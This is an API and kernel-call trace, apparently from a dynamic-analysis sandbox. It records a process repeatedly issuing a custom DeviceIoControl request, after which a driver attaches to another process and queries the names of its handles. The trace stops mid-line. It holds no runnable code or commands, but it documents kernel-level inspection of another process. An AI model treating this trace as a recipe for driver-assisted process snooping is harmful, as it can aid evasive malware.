[0141.593] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.593] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.593] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.593] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0141.593] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.593] PsAcquireProcessExitSynchronization () returned 0x0 [0141.593] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.593] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038e5d40, HandleInformation=0x0) returned 0x0 [0141.593] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.594] PsReleaseProcessExitSynchronization () returned 0x2 [0141.594] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.594] ObQueryNameString (in: Object=0xfffffa80038e5d40, ObjectNameInfo=0xfffffa8002fc3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fc3044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.594] ObfDereferenceObject (Object=0xfffffa80038e5d40) returned 0x3 [0141.594] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.594] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.594] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x72, lpOverlapped=0x0) returned 1 [0141.594] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.594] PsAcquireProcessExitSynchronization () returned 0x0 [0141.594] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.594] ObReferenceObjectByHandle (in: Handle=0x124, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037dbf20, HandleInformation=0x0) returned 0x0 [0141.594] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.594] PsReleaseProcessExitSynchronization () returned 0x2 [0141.594] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.594] ObQueryNameString (in: Object=0xfffffa80037dbf20, ObjectNameInfo=0xfffffa8002fc2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fc2044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.594] ObfDereferenceObject (Object=0xfffffa80037dbf20) returned 0x3 [0141.594] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.594] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.594] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0141.594] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.594] PsAcquireProcessExitSynchronization () returned 0x0 [0141.594] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.595] ObReferenceObjectByHandle (in: Handle=0x1ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed7f20, HandleInformation=0x0) returned 0x0 [0141.595] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.595] PsReleaseProcessExitSynchronization () returned 0x2 [0141.595] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.595] ObQueryNameString (in: Object=0xfffffa8001ed7f20, ObjectNameInfo=0xfffffa8002f21044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f21044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.595] ObfDereferenceObject (Object=0xfffffa8001ed7f20) returned 0x2 [0141.595] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.595] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.595] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.595] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0141.595] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.595] PsAcquireProcessExitSynchronization () returned 0x0 [0141.595] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.595] ObReferenceObjectByHandle (in: Handle=0x1d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002ee2160, HandleInformation=0x0) returned 0x0 [0141.595] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.595] PsReleaseProcessExitSynchronization () returned 0x2 [0141.595] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.595] ObQueryNameString (in: Object=0xfffffa80055f8e40, ObjectNameInfo=0xfffffa8002456044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002456044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.595] ObfDereferenceObject (Object=0xfffffa8002ee2160) returned 0x1 [0141.595] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.595] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.595] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.595] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0141.595] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.595] PsAcquireProcessExitSynchronization () returned 0x0 [0141.596] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.596] ObReferenceObjectByHandle (in: Handle=0x1e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80027dfe80, HandleInformation=0x0) returned 0x0 [0141.596] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.596] PsReleaseProcessExitSynchronization () returned 0x2 [0141.596] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.596] ObQueryNameString (in: Object=0xfffffa80055f8e40, ObjectNameInfo=0xfffffa8002fa0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa0044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.596] ObfDereferenceObject (Object=0xfffffa80027dfe80) returned 0x1 [0141.596] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.596] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.596] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.596] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0141.596] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.596] PsAcquireProcessExitSynchronization () returned 0x0 [0141.596] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.596] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003996980, HandleInformation=0x0) returned 0x0 [0141.596] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.596] PsReleaseProcessExitSynchronization () returned 0x2 [0141.596] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.596] ObQueryNameString (in: Object=0xfffffa8002821370, ObjectNameInfo=0xfffffa8002fa1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa1044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.596] ObfDereferenceObject (Object=0xfffffa8003996980) returned 0x1 [0141.596] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.596] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.596] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.596] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0141.596] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.596] PsAcquireProcessExitSynchronization () returned 0x0 [0141.596] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.597] ObReferenceObjectByHandle (in: Handle=0x210, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003997d10, HandleInformation=0x0) returned 0x0 [0141.597] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.597] PsReleaseProcessExitSynchronization () returned 0x2 [0141.597] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.597] ObQueryNameString (in: Object=0xfffffa80037f6060, ObjectNameInfo=0xfffffa8002fa2044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa2044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.597] ObfDereferenceObject (Object=0xfffffa8003997d10) returned 0x1 [0141.597] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.597] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.597] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.597] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0141.597] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.597] PsAcquireProcessExitSynchronization () returned 0x0 [0141.597] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.597] ObReferenceObjectByHandle (in: Handle=0x21c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039973e0, HandleInformation=0x0) returned 0x0 [0141.597] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.598] PsReleaseProcessExitSynchronization () returned 0x2 [0141.598] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.598] ObQueryNameString (in: Object=0xfffffa80039973e0, ObjectNameInfo=0xfffffa8002fa3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa3044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.598] ObfDereferenceObject (Object=0xfffffa80039973e0) returned 0x1 [0141.598] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.598] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.598] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.598] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0141.598] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.598] PsAcquireProcessExitSynchronization () returned 0x0 [0141.598] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.598] ObReferenceObjectByHandle (in: Handle=0x228, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003998260, HandleInformation=0x0) returned 0x0 [0141.598] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.598] PsReleaseProcessExitSynchronization () returned 0x2 [0141.598] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.598] ObQueryNameString (in: Object=0xfffffa8003998260, ObjectNameInfo=0xfffffa8002fa4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa4044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.598] ObfDereferenceObject (Object=0xfffffa8003998260) returned 0x1 [0141.598] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.598] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.599] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.599] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0141.599] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.599] PsAcquireProcessExitSynchronization () returned 0x0 [0141.599] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.599] ObReferenceObjectByHandle (in: Handle=0x22c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039963d0, HandleInformation=0x0) returned 0x0 [0141.599] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.599] PsReleaseProcessExitSynchronization () returned 0x2 [0141.599] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.599] ObQueryNameString (in: Object=0xfffffa80039963d0, ObjectNameInfo=0xfffffa8002fa5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa5044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.599] ObfDereferenceObject (Object=0xfffffa80039963d0) returned 0x2 [0141.599] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.599] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.599] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.599] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0141.599] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.599] PsAcquireProcessExitSynchronization () returned 0x0 [0141.600] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.600] ObReferenceObjectByHandle (in: Handle=0x268, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800399da20, HandleInformation=0x0) returned 0x0 [0141.600] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.600] PsReleaseProcessExitSynchronization () returned 0x2 [0141.600] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.600] ObQueryNameString (in: Object=0xfffffa800399da20, ObjectNameInfo=0xfffffa8002fa6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa6044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.600] ObfDereferenceObject (Object=0xfffffa800399da20) returned 0x1 [0141.600] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.600] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.600] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.600] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0141.600] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.600] PsAcquireProcessExitSynchronization () returned 0x0 [0141.600] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.600] ObReferenceObjectByHandle (in: Handle=0x270, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800399d780, HandleInformation=0x0) returned 0x0 [0141.600] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.600] PsReleaseProcessExitSynchronization () returned 0x2 [0141.600] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.600] ObQueryNameString (in: Object=0xfffffa800399d780, ObjectNameInfo=0xfffffa8002fa7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa7044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.600] ObfDereferenceObject (Object=0xfffffa800399d780) returned 0x2 [0141.600] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.601] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.601] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.601] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0141.601] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.601] PsAcquireProcessExitSynchronization () returned 0x0 [0141.601] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.601] ObReferenceObjectByHandle (in: Handle=0x274, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800399d630, HandleInformation=0x0) returned 0x0 [0141.601] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.601] PsReleaseProcessExitSynchronization () returned 0x2 [0141.601] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.601] ObQueryNameString (in: Object=0xfffffa800399d630, ObjectNameInfo=0xfffffa8002fa8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa8044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.601] ObfDereferenceObject (Object=0xfffffa800399d630) returned 0x1 [0141.601] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.601] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.601] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.601] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0141.601] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.601] PsAcquireProcessExitSynchronization () returned 0x0 [0141.601] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.602] ObReferenceObjectByHandle (in: Handle=0x2d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0141.602] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.602] PsReleaseProcessExitSynchronization () returned 0x2 [0141.602] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.602] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002fa9044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa9044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.602] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0141.602] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.602] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.602] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.602] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0141.602] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.602] PsAcquireProcessExitSynchronization () returned 0x0 [0141.602] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880051635d0) [0141.602] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0141.602] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.602] PsReleaseProcessExitSynchronization () returned 0x2 [0141.602] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb4 [0141.602] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002faa044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002faa044, ReturnLength=0xfffff88005163550) returned 0x0 [0141.602] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0141.602] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.603] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.603] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.603] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0141.603] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff88005163558 | out: 